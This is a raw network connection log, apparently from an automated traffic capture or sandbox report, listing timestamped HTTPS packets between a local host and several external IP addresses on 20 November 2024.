                                                                                                                                                                                              Nov 20, 2024 21:28:21.227160931 CET4434977513.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.227238894 CET49775443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:21.227426052 CET49775443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:21.227456093 CET4434977513.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.231133938 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.231197119 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.239834070 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.239901066 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.243232965 CET4434976013.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.243320942 CET4434976013.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.243395090 CET49760443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:21.243688107 CET49760443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:21.243707895 CET4434976013.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.243727922 CET49760443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:21.243735075 CET4434976013.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.244314909 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.244386911 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.247294903 CET49776443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:21.247309923 CET4434977613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.247389078 CET49776443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:21.247556925 CET49776443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:21.247570038 CET4434977613.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.270289898 CET44349764141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.270654917 CET49764443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:21.270664930 CET44349764141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.274204016 CET44349764141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.274281025 CET49764443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:21.274775028 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.274853945 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.275779963 CET49764443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:21.275948048 CET44349764141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.276141882 CET49764443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:21.276149988 CET44349764141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.295473099 CET44349756136.143.182.97192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.295531034 CET44349756136.143.182.97192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.295581102 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:21.295617104 CET44349756136.143.182.97192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.295656919 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:21.297432899 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:21.316668987 CET44349765141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.316910028 CET49765443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:21.316924095 CET44349765141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.320094109 CET44349765141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.320169926 CET49765443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:21.320509911 CET49765443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:21.320594072 CET44349765141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.321122885 CET49764443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:21.321604967 CET49777443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:21.321620941 CET44349777199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.321778059 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:21.321791887 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.321810961 CET49777443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:21.321841955 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:21.322302103 CET49779443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:21.322308064 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.322365999 CET49779443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:21.322489023 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:21.322501898 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.322556019 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:21.322614908 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:21.322674990 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.322887897 CET49778443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:21.322900057 CET44349778199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.322918892 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:21.323040962 CET49777443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:21.323054075 CET44349777199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.323170900 CET49780443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:21.323184013 CET44349780199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.323297977 CET49779443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:21.323309898 CET44349779199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.323378086 CET49765443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:21.323386908 CET44349765141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.323710918 CET49781443192.168.2.5199.67.80.86
                                                                                                                                                                                              Nov 20, 2024 21:28:21.323741913 CET44349781199.67.80.86192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.325293064 CET44349756136.143.182.97192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.325340986 CET44349756136.143.182.97192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.325381994 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:21.325390100 CET44349756136.143.182.97192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.325427055 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:21.325448990 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:21.345503092 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.345585108 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.351018906 CET44349756136.143.182.97192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.351063967 CET44349756136.143.182.97192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.351124048 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:21.351136923 CET44349756136.143.182.97192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.351169109 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:21.351190090 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:21.351639032 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.351706028 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.355128050 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.355182886 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.361702919 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.361763954 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.361773968 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.361820936 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.366839886 CET49765443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:21.367860079 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.367934942 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.373802900 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.373898983 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.377098083 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.377170086 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.380825996 CET44349756136.143.182.97192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.380877018 CET44349756136.143.182.97192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.380914927 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:21.380928040 CET44349756136.143.182.97192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.380960941 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:21.380978107 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:21.382679939 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.382755041 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.385238886 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.385301113 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.390546083 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.390619993 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.395647049 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.395711899 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.400741100 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.400815010 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.402617931 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.402672052 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.406964064 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.407047987 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.408550024 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.408612013 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.409329891 CET4434976113.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.409399986 CET4434976113.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.409535885 CET49761443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:21.409748077 CET49761443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:21.409748077 CET49761443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:21.409775972 CET4434976113.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.409790039 CET4434976113.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.411631107 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.411716938 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.414844036 CET49782443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:21.414855957 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.414916039 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.414916039 CET4434978213.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.415030003 CET49782443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:21.415570021 CET49782443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:21.415604115 CET4434978213.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.418374062 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.418435097 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.420402050 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.420479059 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.423758030 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.423825026 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.427233934 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.427310944 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.465892076 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.465945959 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.467652082 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.467730999 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.471254110 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.471327066 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.473239899 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.473301888 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.476551056 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.476613045 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.492888927 CET44349756136.143.182.97192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.492934942 CET44349756136.143.182.97192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.492969036 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:21.492979050 CET44349756136.143.182.97192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.493012905 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:21.493035078 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:21.501925945 CET44349756136.143.182.97192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.501996994 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:21.502003908 CET44349756136.143.182.97192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.502046108 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:21.502089024 CET44349756136.143.182.97192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.502167940 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:21.502316952 CET49756443192.168.2.5136.143.182.97
                                                                                                                                                                                              Nov 20, 2024 21:28:21.502327919 CET44349756136.143.182.97192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.538300991 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.538393974 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.539753914 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.539829969 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.544730902 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.544805050 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.544814110 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.544873953 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.544923067 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.545064926 CET49762443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.545078993 CET44349762141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.550885916 CET49783443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.550909042 CET44349783141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.550976038 CET49783443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.551481009 CET49783443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:21.551493883 CET44349783141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.562371969 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.562591076 CET49767443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:21.562603951 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.563087940 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.563425064 CET49767443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:21.563508034 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.563577890 CET49767443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:21.573800087 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:21.573810101 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.573931932 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:21.574317932 CET49785443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:21.574328899 CET44349785141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.607374907 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.725656033 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:21.725701094 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.725759029 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:21.726074934 CET49786443192.168.2.518.165.220.61
                                                                                                                                                                                              Nov 20, 2024 21:28:21.726089001 CET4434978618.165.220.61192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.734360933 CET44349764141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.734544039 CET44349764141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.734611988 CET49764443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:21.735153913 CET49764443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:21.735184908 CET44349764141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.735491991 CET4434975345.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.735516071 CET4434975345.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.735548973 CET4434975345.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.735564947 CET49753443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:21.735574007 CET4434975345.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.735610962 CET49753443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:21.735620975 CET4434975345.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.735738993 CET49753443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:21.736911058 CET49753443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:21.736921072 CET4434975345.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.784868002 CET44349765141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.784949064 CET44349765141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.785024881 CET49765443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:21.785728931 CET49765443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:21.785741091 CET44349765141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.883488894 CET49787443192.168.2.5104.16.123.96
                                                                                                                                                                                              Nov 20, 2024 21:28:21.883514881 CET44349787104.16.123.96192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.883579969 CET49787443192.168.2.5104.16.123.96
                                                                                                                                                                                              Nov 20, 2024 21:28:21.884047031 CET49787443192.168.2.5104.16.123.96
                                                                                                                                                                                              Nov 20, 2024 21:28:21.884063005 CET44349787104.16.123.96192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.885621071 CET49788443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:21.885634899 CET4434978845.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:21.885700941 CET49788443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:21.885934114 CET49788443192.168.2.545.61.136.196
                                                                                                                                                                                              Nov 20, 2024 21:28:21.885961056 CET4434978845.61.136.196192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.022835016 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.022892952 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.022936106 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.022975922 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.022988081 CET49767443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:22.023005962 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.023024082 CET49767443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:22.023092031 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.023173094 CET49767443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:22.023181915 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.036855936 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.036930084 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.036976099 CET49767443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:22.036984921 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.037025928 CET49767443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:22.142360926 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.182079077 CET49767443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:22.182090998 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.215384007 CET49790443192.168.2.5216.239.36.181
                                                                                                                                                                                              Nov 20, 2024 21:28:22.215419054 CET44349790216.239.36.181192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.215502977 CET49790443192.168.2.5216.239.36.181
                                                                                                                                                                                              Nov 20, 2024 21:28:22.215790987 CET49790443192.168.2.5216.239.36.181
                                                                                                                                                                                              Nov 20, 2024 21:28:22.215816021 CET44349790216.239.36.181192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.227879047 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.227940083 CET49767443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:22.227948904 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.236179113 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.236241102 CET49767443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:22.236248970 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.244509935 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.244551897 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.244574070 CET49767443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:22.244590998 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.244651079 CET49767443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:22.246772051 CET49791443192.168.2.5172.217.17.66
                                                                                                                                                                                              Nov 20, 2024 21:28:22.246799946 CET44349791172.217.17.66192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.246886969 CET49792443192.168.2.5172.217.17.66
                                                                                                                                                                                              Nov 20, 2024 21:28:22.246927977 CET44349792172.217.17.66192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.246929884 CET49791443192.168.2.5172.217.17.66
                                                                                                                                                                                              Nov 20, 2024 21:28:22.246977091 CET49792443192.168.2.5172.217.17.66
                                                                                                                                                                                              Nov 20, 2024 21:28:22.247253895 CET49792443192.168.2.5172.217.17.66
                                                                                                                                                                                              Nov 20, 2024 21:28:22.247272015 CET44349792172.217.17.66192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.247437954 CET49791443192.168.2.5172.217.17.66
                                                                                                                                                                                              Nov 20, 2024 21:28:22.247457027 CET44349791172.217.17.66192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.253010988 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.253150940 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.253200054 CET49767443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:22.253642082 CET49767443192.168.2.5141.193.213.11
                                                                                                                                                                                              Nov 20, 2024 21:28:22.253649950 CET44349767141.193.213.11192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:22.266319990 CET49731443192.168.2.54.175.87.197
                                                                                                                                                                                              Nov 20, 2024 21:28:22.266330004 CET443497314.175.87.197192.168.2.5
